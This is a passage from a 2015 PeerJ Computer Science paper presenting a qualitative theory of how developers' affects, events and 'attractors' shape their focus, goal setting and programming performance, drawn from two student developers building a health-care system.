quantitative results), we asked for further clarification from the participants to solve the discrepancies. As a further action to enhance reliability, but also ethicality of the study, we asked the participants to individually review the present paper in three different times. The first review session happened in the initial drafts of the paper when we solely laid down the results of the study. The second review session happened right before submitting the article. The third review session happened before submitting a revised version of the present article. For the reviews, we asked the participants to evaluate the results in terms of their own understanding of the phenomena under study and the protection of their identity and dignity. Because of their valuable help, the proposed theory is shared with them and further validated by them. RESULTS AND DISCUSSION The study was set in the context of a Web- and mobile-based health-care information systems development between July and September 2014. Two software developers, who were conducting a semester-long real-world project as a requirement for their BSc theses in Computer Science, were put in a company-like environment. Both developers, who we shall call P1 and P2 for anonymity reasons, were male. P1 was 22 years old and P2 was 26 years old. They both had about five years of experience developing Web and mobile systems. P1 and P2 had their own spacious office serving as an open space, their own desks and monitors, a fast Internet connection, flip-charts, a fridge, vending machines, and 24/7 access to the building. The developers accepted to work full time on the project as their sole activity. They were instructed to act as if they were in their own software company. Indeed, the developers were exposed to real-world customers and settings. The customers were the head of a hospital department, a nurse responsible for the project, and the entire nursing department. The development cycle began with a first meeting with the customer, and it ended with the delivery of a featureful first version of the working software. It is beneficial to the reader to provide a brief summary of the main events, which have been extracted from our in-field memos. During the first week, P1 had to work on the project without P2. P2 failed to show up at work. During the first days, P2 gave brief explanations about the absence, e.g., housework or sickness. However, the explanations stopped quickly, and P2 stopped answering to text messages and phone calls. At the Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 11/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 beginning of the second week, P2 showed up at work. P2 had some private issues, which brought some existential crisis. P1 was initially reluctant to welcome P2 in the development, as all the code so far was P1’s creation. The first two days of collaboration brought some tension between the team members, crippled experimentation with the code, and a shared loss of project vision. On the third day of the second week, the team tensions exploded in a verbal fight regarding the data structures to be adopted. At that point, one of the present authors was involved in the discussion. The researcher invited the participants to express their opinion and acted as mediator. A decision was eventually made. The initial tensions between the developers began to vanish, and the work resumed at a fair pace. At the end of the second week, P1 and P2 had a further requirements elicitation session with the customer represented by the head nurse. The development appeared to be back at full speed, and a full reconciliation could be observed between the participants. The progresses succeeded one day after another, and the fully working prototype was demoed and tested during the sixth week. Face-to-face open-ended interviews happened at the beginning of the project during 11 scheduled meetings and 5 impromptu shorter meetings called by the researchers or by the participants. The impromptu meetings were held mostly because of trivial issues, like casual chatting which turned into a proper interview. Only in one case was an impromptu meeting called by P2 when he finally came back to work. We also did not distinguish between the data coming from the scheduled meetings and the impromptu meetings. The interviews were open-ended and unstructured, but they all began with the question How do you feel? In-field observations happened on an almost daily basis. The participants were informed if they were recorded. We recorded a total of 657 min of interviews. Finally, data was gathered via the exchange of thirteen emails. The transcripts of the interviews were completed immediately after the interviews were concluded. The initial coding phase produced 917 unique codes. The focused coding phase was focused on the individual’s experiences of the development process, and it produced 308 codes. Figure 1 provides an example of our coding activities. The axial coding and the- oretical coding produced six themes, which are explained in this section. Inconsistencies between the qualitative data and the data from the Self-Assessment Manikin questionnaire happened three times during the entire study. All three discrepancies were minor, and they were immediately solved upon clarification from the participants. For example, in one case the participant P1 reported low values of valence and arousal, and a neutral value for dominance. During the interview, P1 often stated that he had a frustrating day, but there were no mentions of low-arousal negative affects. When asked to explain how the Self-Assessment Manikin values were representative of the work day, the participant added that he felt low esteem, which was caused by episodes of frustration. Overall, P1 was unexcited and lost over the day; thus the reported low value for arousal. This section provides the proposed theory. The theory is represented in Fig. 2. We describe the discovered themes and categories (boxes) and their relationships (arrows). While Type II theories are not expected to discuss causal explanations in terms of direction and magnitude (Gregor, 2006), we offer them as they were interpreted from the data. Each Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 12/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 Figure 2 A theory of the impact of the affects on programming performance. relationship is accompanied by a verb, which describes the nature of the relationship. Where possible, we precede the verb with some plus (+) or minus (−) signs. A plus (minus) sign indicates that we theorize a positive (negative) effect of one construct to another. A double plus (double minus) sign indicates that we theorize a strong positive (strong negative) effect of one construct to another with respect to a proposed weaker alternative. The reader should bear in mind that our theorized effects are not to be strongly Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 13/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 interpreted quantitatively. That is, a double plus sign is not the double of a single plus sign or an order more of magnitude of a single plus sign. Every entity and relationship is supplied with interview quotes, codes, and related work. Events The events are perceived from the developer’s point of view as something happening. Events resemble psychological objects, which were defined by Russell (2003) as “the person, condition, thing, or event at which a mental state is directed” (p. 3) but also at which a mental state is attributed or misattributed. Events may be non work-related—e.g., family, friends, house, hobbies—or they may be work-related—e.g., the working environment, the tools, and the team members. The interview quotes 1 and 2, and in-field memo 3 are examples of work-related events, while interview quote 4 is not related to work. 1. “Suddenly, I discovered Google Plus Bootstrap, which is a Bootstrap theme resembling Google+. [I implemented it and] it was easy and looking good.”—P1 2. “I found a typo in the name of the key which keeps track of the nurse ID. The bug was preventing a correct visualization of patient-related measurements. Fixing the bug is very satisfying, because I can now see more results on the screen.”—P2 3. P1, talking to P2 and visibly irritated “Again this? You still have not understood the concept! It is <component name>that is static, while the measurement changes!” 4. “This morning I received a message with some bad news related to my mother. I imme- diately desired to abandon development in order to solve the possible issue. The focus was more on that issue than on any other issue at work.”—P1 We further distinguish public events from private events. Public events are those that could be observed by a third person. The in-field memo 3 is an exemplar public event. Private events are known to oneself only, even if they are coming from the real world. For example, the event described in interview quote 4 was real and coming from the real world. However, it was not observable by a third person. Events have often an episodic nature, as P1 and P2 noted on several occasions. However, private events can also be reflections, realizations, memories, and situations as with psychological objects. 5. Interviewer: “Have you focused better on your programming task today?” P2: “Yes, today went better [than usual]. It’s probably when you do that [programming] alone that I am more.. it is more difficult, to write code. When I am working with somebody it goes better, you can work better.” In the interview quote 5, P2 described the general situation, or a summary of the work day events with respect to usual situations. Situations can be causation chains or aggregation of previous events. The participants do not need to be aware of events as merely events or as situations as it does not make any difference to them. We are not representing situations in Fig. 2 because we still consider them as events. The rest of the paper provides numerous other examples of events. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 14/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 Affects During the development process, several affects have been triggered by events and felt by the developers. We coded only affects which had been directly mentioned by P1 and P2. The following are the detected positive and negative affects (respectively) being felt during the development cycle. accompanied, accomplished, attracted, contented, dominating, enjoyed, excited, fun, good, gratitude, happy, illuminated, motivated,5, optimistic, positive, satisfied, serene, stimulated, 5 The careful readers might turn up their nose here. As we wrote in Graziotin, Wang & Abrahamsson (2015b) affects are not motivation, as they are not job satisfaction, etc. Yet, affects are important components of these psychological constructs, and studying complex multifaceted constructs like motivation would require different approaches and different measurement instruments. For this reason, if the participants only stated that they felt motivated or satisfied, we considered them as affects, as it might well be the case that they were expressing emotional judgments about such constructs. In any case, the inclusion or exclusion of such terms as affects would not change the results of this study. supported, teased, welcomed. angry, anxious, bored, demoralized, demotivated, depressed, devastated, disinterested, dominated, frustrated, guilty, loneliness, lost, negative, pissed off, sad, stagnated, unexcited, unhappy, unsatisfied, unstimulated, unsupported, worried. Our qualitative results on the perceived affects agree with the quantitative results of Wrobel (2013) and Müller & Fritz (2015), which indicated that developers do feel a very broad range of affects in the software development process. Examples of events that caused positive and negative affects (respectively), coded using the gerund principle of Charmaz (2006) method for analyzing qualitative data, are the following. ‘Feeling contented because a very low number of code changes caused big achievement in terms of quality [or functionality],’ ‘Feeling gratitude towards a tool,’ ‘Feeling attracted by a junk of code because of anticipating its value for the end user,’ ‘Feeling motivated because personal issues are now out clear,’ ‘Feeling supported because of the brought automation of a framework,’ ‘Feeling serene because of a low workload right after a high workload,’ ‘Feeling happy because of sensing the presence of a team member after reconciliation.’ ‘Feeling alone [or unsupported] while working [or by a team member],’ ‘Feeling anx- ious because of a sudden, not localizable bug that ruined the day,’ ‘Feeling anxious by not understanding the code behavior,’ ‘Feeling bored by implementing necessary but too static details [e.g., aesthetic changes instead of functionalities],’ ‘Feeling frustrated by the different coding style of a team member,’ ‘Feeling angry by failing to integrate [or extend] an external component,’ ‘Feeling stagnated in life [or job, or studies],’ ‘Feeling unstimulated because of a too analytic task.’ According to previous research, psychological objects—sometimes in the form of events, sometimes as stimula—trigger affects all the time, and an individual is under a particular affect or a blend of affects all the time (Russell, 2003). Sometimes, these affects will be perceived strongly. Sometimes, they will not be perceived at all despite their presence. A failure to attribute an affect to an event does not demise the affect itself. This affect misattribution coincides with some theories of moods (Fisher, 2000; Weiss & Cropanzano, 1996), which consider affect as non attributed emotions or simply as free-floating, unattributed affect (Russell, 2003). Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 15/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 Attractors We observed that some events had a particular affective meaning to the participants. These affective experiences were assumed high importance to the participants with respect to other affective experiences; thus, we called them attractors. Attractors are affects, which earn importance and priority to a developer’s cognitive system. At a very basic instance, they gain the highest possible priority and emphasis to a developer’s consciousness, to the point that behaviors associated to the attractor can be observed as it is experienced. An example can be offered by quote 6 below. 6. P2: “I did a really good job and fixed things also due to Sublime Text (ST).” Interviewer: “What has ST done for you?” P2: “When you copy/paste code around and refactor, ST offers you at least three different ways for doing search and replace. It is really advanced.” Interviewer: “Would another tool make a difference to your work instead?” P2: “With another editor or an IDE it would be another story, especially if an editor tries to do too much, like Eclipse. I think that the compromise between functionality and usability of ST is way better.” Interviewer: “Do you think that ST is enhancing your productivity then?” P2: “Absolutely. I was extremely excited by these features and they pushed me to do more and more.” Interviewer: “Were you actually thinking about this while you were working?” P2: “Definitely. First, I turned the monitor towards P1 and showed him the magic. But I felt good for the rest of the day, and I accomplished more than what I hoped I could do.” In interview quote 6, P2 offered an insight regarding the affects triggered by a software development tool. The excitement toward the tool features was an attractor to P2. The attractor became central to the developer subjective conscious experience, not just an underlying affect. Moreover, the behavior caused by the experience of the attractor was directly observable. Interview quote 6 emphasizes that attractors are not necessarily concerns or negative in nature. Interview quote 4 provides instead an example of a negative attractor. P1 realized that a non work-related event was not desirable, thus generating negative affects. What happened to his mother was important and demanded his attention. P1 was consciously experiencing the negative attractor, and the appraisal of such attractor had consequences to his way of working. Attractors are not necessarily stronger than general affects for gaining a developer’s subjective conscious experience. They might just be there and still have an impact. We can access them retrospectively. Interview quote 7 is an example of such occurrence. 7. “I am not progressing.. in the working environment.. with my university career. With life. I feel behind everybody else and I do not progress. And I am not even sure about what I want to do with my life. I got no visual of this.”—P2 Moreover, interview quote 7 shows that attractors are not always caused by single events. Attractors can become reflections on a series of events as a consequence of them and as a summation of them. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 16/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 Another example of reflections of a series of events that have however an impact on a developer’s subjective consciousness is shown in interview quote 8. P2 was having a life crisis which resulted in a loss of the vision of his own life. 8. “When I was alone at home, I could not focus on my programming task. The thought of me not progressing with life did often come to my mind. There I realized that I was feeling depressed.”—P2 In interview quote 8, the participant had a negative depressed attractor with the attached meaning I am not progressing with life. The rumination associated with this attractor was strong and pervaded P2 personal experience and his everyday life of that period. Attractors are part of the personal sphere as much as affects are—indeed, they are special affects for us. In the software process improvement literature, the term concern has been used as commitment enabler (Abrahamsson, 2001). The commitments are formed in order to satisfy such concerns, i.e., needs (Flores, 1998). Attractors are not concerns as employed by Abrahamsson (2001). An important difference is that concerns are linked to actions, i.e., actions are driven by concerns. On the other hand, attractors are affects, and affects are not necessarily concerns, nor do they necessarily cause immediate actions. Under our current theoretical framework, a blend of affects constitutes an individual’s happiness, at least under the hedonistic view of happiness (Haybron, 2001). According to this view, being happy coincides with the frequent experience of pleasure; that is, happiness is reduced to a sequence of experiential episodes (Haybron, 2001). Frequent positive episodes lead to feeling frequent positive affects, and frequent positive affects lead to a positive affect balance (Diener et al., 2009). Lyubomirsky, King & Diener (2005) consider a person happy if the person’s affect balance is mainly positive. However, we have just stated in this section that some developers’ affects are more important than other affects. Let us now be more specific. As argued by the philosopher Haybron (2001), a quantitative view of happiness based solely on frequency of affects is psychologically superficial because some affects do not have distinct episodes or attributions (as in moods). Even more, Haybron (2005) has seen happiness as a matter of a person’s affective condition where only central affects are concerned. We see a similarity between attractors and Haybron (2005) central affects. As attractors are important affects, we agree that they are a strong constituent of the happiness of the individuals. However, non attractors could be central affects, as well. In our observations, we saw that attractors are also affects that are easily externalized by the participants, and we will show that their originating events are more visible to them. Furthermore, we will show that attractors are more linked to the focus and the developers’ performance. Thus, we differentiate them from central affects. The participants could sometimes realize the affective meaning of attractors by themselves, as in quote 8. There is often the need to externalize them in order for an observer to feel them. We found that sometimes, externalizing affects is alone beneficial, as seen in the next section. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 17/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 Interventions While the presence of researchers has always an influence on the participant’s behav- iors (Franke & Kaul, 1978), it happened twice that our interaction with the participants had a clear effect on their feelings and behaviors. We call such events interventions. Interventions are events—as shown in Fig. 2 by the UML-like grey arrow with a white arrowhead—that mediate the intensity of already existing negative attractors, thus reducing them as much as possible to normal affects. After externalizing his depressed state in interview quote 8, P2 continued as follows: 9. “What we were doing was not ‘in focus.’ The result really didn’t matter to me. To my eyes, we were losing time. However, once I’ve told you what I told you [the personal issues] you know that as well. It is not that I am hiding or that I am inventing things out..I now have no more the possibility to wriggle anymore. I told you why I was not there and I am feeling better already. I am now here for two days, and I feel way better than before.”—P2. The field memos provided more evidence on the effectiveness of interventions. For example, during the reconciliation, which happened at the beginning of week 2, the developers had frequent soft fights. P2 battles fiercely for his opinions and design strategies. However, he is listening to P1 opinions. On the other hand, P1 seems more interested to get stuff done, and he seems less prone to listen to P2. P2 is probably realizing this and responds using passive-aggressive modes. Some not-so-very nice words fly. P1 and P2 are less aggressive with each other. My proposal to let them express their opinions and to invite them to listen to each other seems to have a positive effect. A solution, albeit influenced by me, seems to have been reached. A field memo six days after the reconciliation was much more positive. P1 and P2 have been working with an almost stable pace. There does not seem to be an elephant in the room anymore. Both of them smile often and joke with each other. You can feel them happier than before. I often see P1 and P2 showing their results to each other. The work seems way more productive than last week. Even personal issues were having less impact on P2 as he revealed in an interview nine days after the reconciliation. 10. “My personal issues are having a minor impact on my productivity, despite the fact that my mind wonders in different places. It is because we are now working well together and share a vision.”—P2 Interventions in Fig. 2 are reached by dashed arrows, which start from affects and attractors, and have a dashed arrow pointing to focus. The dashed arrows, together with the labels mediated by and amplify (or reduce) drive on, indicate alternative paths in the process. That is, affects and attractors are mediated by interventions, which amplify or reduce their drive on the focus. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 18/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 These interventions suggest that a mediator is a useful figure in a software development team. The mediator should be able to gently push the team member to let out their opinions, views, and affects. A more concrete example could be an agile coach or a team leader according to the team settings. Focus—progressing and goal setting In this section, we explain the construct of focus, which is related to progressing toward goals and the setting of such goals. The focus often referred to a general mental focus, e.g., “I was in focus after I could refactor all that code using Sublime Text search-and-replace capacity.”—P2, which usually matched a focus on the current chunk of code. However, the focus on the current chunk of code was with respect to a goal. P2 mentioned focus in interview quote 8, where he told the interviewer that he could not focus on the programming task while at home, because of the realization of being depressed. A more tangible focus on the code at hand was portrayed by P1 in the following interview quote. 11. “After our [between P1 and P2] reconciliation and after the meeting with [the head nurse], I often developed in full immersion. When I am in full immersion mode, nothing exists except what I am doing. I have a goal in mind and I work toward it. I don’t think about anything else but my goal and my progress towards it.”—P1 During the last interview, P1 was directly asked about the way he focuses while developing software and what he thinks about. Besides the full immersion mode that P1 described in quote 11, he described a “lighter mode of immersion. I enter this mode when I am tired, when I write less functional aspects of the code.” but also “when I am interrupted by negative news or when I focus my attention more on some problems.” In quote 12, P2 shared his view on negative affects and how they hinder performance by changing the way he perceived events as attractors. 12. “My negative thoughts have been the same lately—more or less–but I sometimes change the way I look at them. It is often positive, but it is often negative, too. Maybe I realize this more when I have a negative attitude towards them. It influences my work in a particular way: my concerns become quicksand.”—P2 Our focus appears to be similar to the flow as depicted by Csikszentmihalyi (1997), and found in the related work by Meyer et al. (2014) and Müller & Fritz (2015), which was described as an attention state of progressing and concentration. Additionally, the participants often mentioned the term ‘vision,’ which was meant as the “ability to conceive what might be attempted or achieved.” (OED Online, 2015). For this reason, we preferred using the term goal setting. The participants linked the focus and the capacity of setting goals. Goal settings has an established line of research in organizational behavior and psychology—one of the seminal works is by Locke (1968)—that would deserve its own space in a separate article. It involves the development of a plan, which in our case is internalized, designed to guide an individual toward a goal (Clutterbuck, 2010). Those goals found in our study were related to future achievements in the short and Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 19/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 long run, i.e., the task and the project. One example of task goals lies in the interview quote 13. Whenever the focus of attention was on the current code melted with the goal setting of task and project, the performance was reported and observed as positive. However, if something was preventing the focus on the current code—now—and the focus on the goal or the goal setting of the task or project—then—the performance was reported and observed as negative. P2 summarized these reflections concisely in quote 13. 13. “It does not matter how much it is actually going well with the code, or how I actually start being focused. Then it [my thoughts about my personal issues] comes back into mind. It is like a mood. I cannot define it in any way. But it is this getting rid of a thought, focusing back to work and the task goal. Here [shows commit message] I wanted to add the deletion of messages in the nurses’ log. But when it happens, I lose the task vision. What was I trying to accomplish? WHY was I trying to do this? It happens with the project vision, too. I don’t know what I am doing anymore.”—P2 The project goal setting is similar to the task goal setting. The difference is that project goal setting is the capacity of perceiving the completion of a project in the future and visualizing the final product before its existence as P1 outlined in interview quote 14. 14. “After we talked to [the head nurse], we gathered so much information that we over- looked or just did not think about. [...] between that and the time you [the researcher] invited us to speak about our issues and mediated among our opinions, we had a new way to see how the project looked like. The product was not there still, but we could see it. It was how the final goal looked like.”—P1 There is a link between focusing on the code and focusing on the task goal. Staying focused on the code meant staying focused on the now (and here). It is the awareness of the meaning of each written line of code towards the completion of a task. Focusing on the task and project goals meant staying focused on the then (and there). It was meant as the capacity of envisioning the goal at the shorter term (the task) and the overall goal of the project. At the same time, focusing on the task and the project meant the possibility to define a task completion criteria, the awareness of the distance towards the completion of such task, and to re-define the goal during the work day. Our findings are in line with those of Meyer et al. (2014), where the participants in a survey perceived a productive day as a day where “they complete their tasks, achieve a planned goals or make progress on their goals” (p. 21). The number of closed work items, e.g., tasks and bugs, was the most valued productivity measurement among developers. The full immersion mode mentioned by P1 in interview quote 11 resembles the flow depicted by Csikszentmihalyi (1997) and mentioned in the related work by Meyer et al. (2014) and Müller & Fritz (2015). Performance The performance was generally understood by the participants as their perceived effective- ness in reaching a previously set expectation or goal. Or, whenever then became now. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 20/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 15. “Last week has been chaotic. We worked very little on the code. P2 played around with the programming framework. P2 tried to adapt an example program to fit our needs. So, P2 studied the chosen framework. I can say that P2 was productive. I spent my time doing refactoring and little enhancements of what was already there. Little functionality was developed so far. In a sense, we still performed well. We did what we were expecting to do. Even if I did so little. I still laid down the basis for working on future aspects. So yeah, I am satisfied.”—P1 16. Interviewer: “What happened during this week?” P2: “Well, it happened that..I did not behave correctly in this week. I could not do a single commit.” We observed that the affects have an impact on the programming performance of the developers. This is achieved by driving the focus that developers have on the currently focused code, the ongoing task, or the project itself.6 P2 suggested already, in interview 6 The aim of this study is to offer a theory of the impact of affects on performance while programming rather than proposing a performance or productivity theory. A plethora of factors influence the performance of developers—see Wagner & Ruhe (2008); Sampaio et al. (2010) for a compre- hensive review of the factors—and affects are one of them, although they are not yet part of any review paper. At the same time, software development performance is composed of several complex interrelated constructs— see Petersen (2011) for a review of productivity measurements—to which we add those driven by cognitive processes and also influenced by affects, e.g., creativity and analytic problem solving capability (Graziotin, Wang & Abrahamsson, 2014a). quote 6, that the excitement caused by the discovery of the useful search-and-replace functionalities in his editor had pervaded his work day. This positive attractor caused him to be productive also when not using such functionalities. P2 could also offer cases of the opposite side, like the one in quote 17. 17. “I was lost in my own issues. My desire to do stuff was vanishing because I felt very depressed. There was not point in what I was currently doing, to the point that I could not realize what I had to do.”—P2 More precisely, positive affects have a positive impact on the programming performance—as they drive the focus positively—while negative affects have a negative impact on the programming performance—as they drive the focus negatively. While most of the previous quotes are examples on the negative side, quote 6 and the following quote are instances of the positive case. 18. P1: “I now feel supported and accompanied by P2. We are a proper team.” Interviewer: “What has changed?” P1: “It’s that now P2 is active in the project. Before [the reconcilia- tion] P2 was not here at all. [. . . ] If he joined after our meeting with [the head nurse], there was the risk to see him as an impediment instead of a valid resource and team member. Now, I feel happier and more satisfied. We are working very well together and I am actually more focused and productive.” A positive focus has a positive effect on programming performance. But, a focus on the code toward a task or project goals (or a combination of them) have an even stronger positive impact on the programming performance. We provide some codes related to the consequences of positive and negative affects (respectively) while programming. ‘Limiting the switch to personal issues because of feeling accompanied by a team member,’ ‘Switching focus between the task and the positive feelings caused by a tool makes productive,’ ‘Focusing better on code because of the positive feelings brought by reconciliation,’ ‘Focusing Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 21/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 less on personal issues [more on the code] because of a sense of being wanted at work,’ ‘Focus- ing more on code because of feeling supported and in company,’ ‘Committing code frequently if feeling in company of people.’ ‘Abandoning work because of negative feelings fostered by negative events,’ ‘Avoiding coming to work because of lost vision [and depression],’ ‘Avoiding committing working code during day because of loneliness,’ ‘Choosing an own path because of the loneliness,’ ‘Switching focus between personal issues and work-related task prevents solving programming tasks,’ ‘Losing focus often when feeling alone,’ ‘Losing the project vision because of quicksanding in negative affects,’ ‘Not reacting to team member input because of bad mood,’ ‘Realizing the impediments brought by personal issues when they are the focus of attention,’ ‘Trying to self-regulate affects related to negative events and thoughts lowers performance,’ ‘Un- derestimating an achievement because of loneliness,’ ‘Worrying continuously about life achievements and avoiding work.’ Comparison of the theory with related work The proposed theory can be seen as a specialized version of Affective Events Theory (AET, (Weiss & Cropanzano, 1996)). It provides an affect-driven theory explaining how events, both work-related and not, impact the performance of developers through their focus and goal setting while programming. Therefore, our study produces evidence that AET is an effective macrostructure to guide research of affects on the job in the context of software development. At the same time, our proposed theory is reinforced by the existence of AET itself. We also note that our theory is partially supported in Müller & Fritz (2015) independent study—built upon one of our previous studies (Graziotin, Wang & Abrahamsson, 2015a)—which was conducted at about the same time of the present study.7 Among 7 Furthermore, at our submission time the work by Müller & Fritz (2015) had just been publicly accepted for inclusion in ICSE 2015 proceedings, but it is currently still not published formally. We obtained their work through an institutional repository of preprints. their findings, the self-assessed progressing with the task is correlated with the affects of developers; the most negative affects were correlated with less focus on clear goal settings and positive affects were linked with focusing and progressing toward the set goals. Finally, our findings are in line with the general findings of goal settings research. That is, the task performance is positively influenced by shared, non conflicting goals, provided that there are fair individuals’ skills (Locke & Latham, 2006). Happy, therefore productive or productive, therefore happy? Let us now reason a little on the causality aspects between affects and performance. We note that the participants have always explicitly stated or suggested that the influence of affects on performance is of a causality type. Some researchers have warned us that there might instead be a correlation between the constructs, as well as a double causality (I am more productive because I am more happy, and I am more happy because I am more produc- tive). Indeed, so far in our previous studies (Graziotin, Wang & Abrahamsson, 2014a; Grazi- otin, Wang & Abrahamsson, 2015a) we have argued for correlation, not causation. In the present study, we could not find support in the data for a double causation, but for a causality chain Happy, therefore productive, in line also with related research Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 22/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 (Wrobel, 2013). However, it seems reasonable that we are happier if we realize our positive performance. We speculate here that a third, mediating option might exist. In the proposed theory, and in several other theories in psychology, being happy is reduced to frequent feeling of positive affects (Haybron, 2001). As argued by Haybron (2007), the centrality of affects might be relevant, as well. Haybron (2007) stated, as an example, that the pleasure of eating a cracker is not enduring and probably not affecting happiness; therefore, it is considered a peripheral affect. Peripheral affects arguably have smaller—if not unnoticeable—effects on cognitive activities. It might be the case that the positive (negative) affects triggered by being productive (unproductive) do exist but have a small to unnoticeable effect on future productivity. However, this is outside the scope of this study. We report our backed up speculation as causation for future work. CONCLUSION In this qualitative, interpretive study, we constructed a theory of the impact of affects on software developers with respect to their programming performance. As far as we know, this is the first study to observe and theorize a development process from the point of view of the affects of software developers. By echoing a call for theory building studies in software engineering, we offer first building blocks on the affects of software developers. For this reason, we designed our theory development study using a small sample adhering to guidelines for generating novel theories, thus enabling the development of an in-depth understanding of an otherwise too complex and complicated set of constructs. The theory conceptualization portraits how the entities of events, attractors, affects, focus, goal settings, and performance interact with each other. In particular, we theorized a causal chain between the events and the programming performance, through affects or attractors. Positive affects (negative affects) have a positive (negative) impact on the programming task performance by acting on the focus on code, and task and project goals. The theory introduces the concept of attractors, which are affects that earn importance and priority to a developer’s cognitive system and, often, to their conscious experience. Attractors have an even higher impact on programming performance than ordinary affects. Finally, we also provided evidence that fostering positive affects among developers boosts their performance and that the role of a mediator bringing reconciliations among the team members might be necessary for successful projects. Contributions and implications Our study offers multiple contributions and implications. The theoretical contributions lie in the theory itself. The theory incorporates the impact of affects on performance through an influence on the focus of developer’s consciousness on coding and on several aspects of goal settings (task, project). In addition, we introduced the concept of attractors for developers, which is a novel construct based on affects and events at different spheres (work-related and not, private or public). The theory is proposed as part of basic science of software engineering, and it is open to falsification and extension. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 23/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 As stated by Lewin, “there is nothing quite so practical as a good theory” (Lewin, 1945). The practical implication of our study is that, despite the idea among managers that pressure and some negative feelings help in getting the best results out, there is growing evidence that fostering (hindering) positive (negative) affects of software developers has a positive effect on the focus on code, and task and project goal settings, and, consequently, on their performance. Additionally, we found evidence that a mediator role to reconcile the developers’ issues and conflicts is a way to foster positive affects and mediate negative attractors among them. The proposed theory can be employed as a guideline to understand the affective dynamics in a software development process. The theory can be used to foster a better environment in a software development team and to guide managers and team leaders to enrich their performance by making the developers feel better. On the other hand, our conceptualized theory can guide the team leaders to understand the dynamics of negative performance when it is linked to negative affects. Limitations The most significant limitation of this research to be mentioned lies in its sample. Although it is very common for software engineering studies to recruit computer science students as participants to studies (Salman, Misirli & Juristo, 2015), for some readers this might still be considered a limitation. First, it is true that our participants were enrolled to a BSc study in computer science, but they both had a working history as freelancers in companies developing websites and Web applications. While our developers did not have to be concerned about assets and salaries, they were paid in credit points and a final award in terms of a BSc thesis project. Tichy (2000) and Kitchenham et al. (2002) argued that students are the next generation of software professionals as they are close to the interested population of workers, if not even more updated on new technologies. Indeed, the empirical studies comparing students in working settings with professionals did not find evidence for a difference between the groups (Svahnberg, Aurum & Wohlin, 2008; Berander, 2004; Runeson, 2003; Höst, Regnell & Wohlin, 2000; Salman, Misirli & Juristo, 2015). The conclusions from the previous studies are that students are indeed representatives of professionals in software engineering studies. The non-inclusion of female participants might be considered a further limitation of this study. There is a widespread popular conception that there are gender differences in emotionality (McRae et al., 2008). Evidence has been found for gender differences at the neural level associated to reappraisal, emotional responding and reward processing (McRae et al., 2008), and for a female having greater reactivity to negative stimuli (Gardener et al., 2013) and adoption of different emotion regulation strategies (Nolen-Hoeksema & Aldao, 2011). While more studies on gender differences are needed as the produced evidence is not enough yet (Nolen-Hoeksema, 2012), it might be the case that the inclusion of a female developer would have made the dataset richer, and perhaps would have led to a more gender-balanced theory. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 24/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 While we argued extensively about the choice of the sample size in section Theory Construction and Representation, we repeat here that there was the need to keep the phenomenon under study as simple as possible given its complex nature (Barsade & Gibson, 1998). Furthermore, when novel theories are to be developed in new domains, such as software engineering, a small sample should be considered (Järvinen, 2012). This strategy, while sometimes seen as limiting, pays off especially for setting out basic building blocks (Weick, 1995). As argued by Bendassolli (2013), even one observation could be sufficient for theorizing as so far as “phenomena should be directly explained by theory, and only indirectly supported by the data” (quoted from Section 6.2). Our choice of the small sample size was seen as a benefit for the purposes of this explanatory investigation. The reason is that in a real company, the source of events is vast and complex. There are team dynamics with complicated, and even historical, reasons that are harder to grasp—triggering a complex, powerful network of affects (Barsade & Gibson, 1998)—thus lifting the study’s focus out from the programming itself. Future work We have three directions of research to suggest to the readers. The first one is an immediate continuation of our study. As our study was explanatory, we suggest future research to test the proposed theory and to quantify the relationships in quantitative studies, in software engineering field but also in other domains to understand if and how the specifics particular to the software engineering context affect the applicability of our theory. Although quantifying the impact of attractors was beyond the scope of this study, we feel that negative attractors triggered by non work-related events and positive attractors triggered by work-related events have the strongest impact on the performance of software developers. Furthermore, this study focused on the dimensions of positive and negative affects. It is expected that different types of affects and attractors matter more than other, and have different impact on the focus and performance. We leave future studies the option to study discrete affects, e.g., joy, anger, fear, frustration, or different affect dimensions, e.g., valence, arousal, and dominance. Our second suggestion for future studies is to focus on dynamic, episodic process models of affects and performance where time is taken into consideration. The underlying affects of developers change rapidly during a workday. The constituents and the effects of such changes should be explored. Additionally, exploring the dynamics of affects turning into attractors (and possibly vice-versa) and what causes such changes will provide a further understanding of the effectiveness of interventions and making developers feeling happier, thus more productive. Finally, our third direction for future research is to broaden the focus on (1) artifacts different than code, such as requirements and design artifacts, and (2) understanding the complex relationship of affects and software developers’ motivation, commitment, job satisfaction, and 